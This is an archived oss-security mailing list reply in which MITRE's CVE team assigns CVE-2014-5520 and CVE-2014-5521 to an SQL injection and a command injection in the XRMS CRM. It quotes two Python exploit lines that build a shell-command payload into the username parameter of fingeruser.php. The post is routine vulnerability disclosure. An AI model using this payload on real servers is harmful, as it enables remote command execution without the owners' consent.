Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 29 Aug 2014 05:06:01 -0400 (EDT)
From: cve-assign@...re.org
To: bch@...h.ai
Cc: cve-assign@...re.org, oss-security@...ts.openwall.com
Subject: Re: XRMS SQLi to RCE 0day

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> We get SQL injection via $_SESSION poisoning

Use CVE-2014-5520.


> exploit a trivial command injection
> cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
> url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd

Use CVE-2014-5521.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (SunOS)

iQEcBAEBAgAGBQJUAEH4AAoJEKllVAevmvmsyX0H/3MDCARe+SyjOC1IGHrZC+sM
66Q3DelGzUBB2kU+lXVaEhibITT19oyKl/k//PbippCJv6sdu2gjcxeKWzatbPK9
6zTxfjdrcidxhp3a5VPJQA9Bk/v0sTwFyjz+RN/p1c/GMQV4oHOp5TNv0GUV10A2
PB3cx0/fCKpRa5EbrsFdxAL3lEAw25KiC1SCSZcrssXGuVJKDcfZJNfmiGs1vDpX
TSaULBoe8lLOWr+Xw2az8WOtsh0FX3xhi7Z8ohxnw5AykuJ6Z7CgM875Gj3xM8Tb
e76rwNIvPXMI3z7IcdB8ymt0Z8g0oM4v6IdX8z157Ce5c2tG6U/gwsfPmCSQPpo=
=Zzco
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ